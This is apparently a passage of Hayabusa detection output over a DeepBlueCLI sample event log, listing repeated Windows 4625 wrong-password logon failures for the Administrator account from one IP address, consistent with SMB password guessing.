01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aqldRjcLl8KFZr5h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ycNPBtmRHShPOcRA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ISlMGsVvXry0rbju : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MjGjh70EQ5YVGJUt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yaYM5N2kuvuRCHRU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 32wgj2t7BLBviVxd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vr1kMRxLEaCIWIbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4PHEJyKgp5wXRtBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbaoz8rTZVXUjRAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d4eD3JQ5gquIqgND : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9slFFSSXhFxPqG1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:11.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YDb5Up4KwJj0hN5n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.063 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxqIpDLlnf6Xyc34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rTCTTYmKTIzzJwxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.145 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oD3dLxlB3qWIhZEQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fe9xMOoCxPJIIyVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.246 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DW3YgBZYiGTeEw66 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VAKeeIcOeiQ3H9NF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.338 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nmF3ot3gJCsBlSwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wDjoResfZvvVqqE5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V4dwzMwvVtzztGwr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qklApBFOMxVzucD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:11.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0IJSphtLB3eNARBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLOFe4w5KpJ2UaGM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3JTWkGadY1fJE2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8VM66P8Vluf7yrL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cdYiwh3QjdA0Zoge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ou3FPUI5bFcUvuFC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.952 